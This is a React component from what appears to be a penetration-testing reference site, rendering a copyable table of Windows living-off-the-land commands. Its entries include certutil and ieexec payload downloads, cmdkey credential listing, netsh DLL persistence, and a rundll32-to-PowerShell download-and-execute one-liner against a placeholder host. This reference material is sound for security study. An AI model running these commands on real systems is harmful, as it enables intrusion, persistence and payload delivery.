import React from 'react';
import { Table } from 'react-bootstrap';
import { CopyToClipboard } from 'react-copy-to-clipboard';
import { FaRegCopy } from 'react-icons/fa';
import '../../pages.css';

function LolBas() {

    return (
        <div className="mod-container">
            <h4>LOLBAS | Living Off The Land Binaries & Scripts</h4>
            <p className="mod-description">
                The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques.
            </p>
            <Table striped variant="dark">
                <tbody className="break-all">
                    <tr>
                        <td>
                            <p>Download via CertUtil</p>
                            <p style={{ color: "#5797b7" }}>certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe</p>
                        </td>
                        <td>
                            <CopyToClipboard text={`certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe`}>
                                <div className="ctc-icon">
                                    <FaRegCopy />
                                </div>
                            </CopyToClipboard>
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <p>List cached credentials</p>
                            <p style={{ color: "#5797b7" }}>cmdkey /list</p>
                        </td>
                        <td>
                            <CopyToClipboard text={`cmdkey /list`}>
                                <div className="ctc-icon">
                                    <FaRegCopy />
                                </div>
                            </CopyToClipboard>
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <p>Execute via Explorer</p>
                            <p style={{ color: "#5797b7" }}>explorer.exe /root,"C:\Windows\System32\calc.exe"</p>
                        </td>
                        <td>
                            <CopyToClipboard text={`explorer.exe /root,"C:\Windows\System32\calc.exe"`}>
                                <div className="ctc-icon">
                                    <FaRegCopy />
                                </div>
                            </CopyToClipboard>
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <p>Download via IEexe</p>
                            <p style={{ color: "#5797b7" }}>ieexec.exe http://x.x.x.x:8080/bypass.exe</p>
                        </td>
                        <td>
                            <CopyToClipboard text={`ieexec.exe http://x.x.x.x:8080/bypass.exe`}>
                                <div className="ctc-icon">
                                    <FaRegCopy />
                                </div>
                            </CopyToClipboard>
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <p>Execute via Netsh</p>
                            <p>Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called</p>
                            <p style={{ color: "#5797b7" }}>netsh.exe add helper C:\Users\User\file.dll</p>
                        </td>
                        <td>
                            <CopyToClipboard text={`netsh.exe add helper C:\Users\User\file.dll`}>
                                <div className="ctc-icon">
                                    <FaRegCopy />
                                </div>
                            </CopyToClipboard>
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <p>Download and Execute via Rundll32</p>
                            <p>Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.</p>
                            <p style={{ color: "#5797b7" }}>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"</p>
                        </td>
                        <td>
                            <CopyToClipboard text={`rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"`}>
                                <div className="ctc-icon">
                                    <FaRegCopy />
                                </div>
                            </CopyToClipboard>
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <p>Execute via Wmic.exe</p>
                            <p>Execute calc from wmic.</p>
                            <p style={{ color: "#5797b7" }}>wmic.exe process call create calc</p>
                        </td>
                        <td>
                            <CopyToClipboard text={`wmic.exe process call create calc`}>
                                <div className="ctc-icon">
                                    <FaRegCopy />
                                </div>
                            </CopyToClipboard>
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <p>Download via Powerpnt.exe</p>
                            <p>Downloads payload from remote server.</p>
                            <p style={{ color: "#5797b7" }}>Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"</p>
                        </td>
                        <td>
                            <CopyToClipboard text={`Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"`}>
                                <div className="ctc-icon">
                                    <FaRegCopy />
                                </div>
                            </CopyToClipboard>
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <p>Download and Execute via Update.ext</p>
                            <p>The above binary will go to url and look for RELEASES file, download and install the nuget package.</p>
                            <p style={{ color: "#5797b7" }}>Update.exe --update=[url to package]</p>
                        </td>
                        <td>
                            <CopyToClipboard text={`Update.exe --update=[url to package]`}>
                                <div className="ctc-icon">
                                    <FaRegCopy />
                                </div>
                            </CopyToClipboard>
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <p>A more extensive list of LOLBAS commands can be found here:</p>
                            <p style={{ color: "#5797b7" }}>https://lolbas-project.github.io/</p>
                        </td>
                        <td>
                            <CopyToClipboard text='https://lolbas-project.github.io/'>
                                <div className="ctc-icon">
                                    <FaRegCopy />
                                </div>
                            </CopyToClipboard>
                        </td>
                    </tr>
                </tbody>
            </Table>
        </div>
    )
}

export default LolBas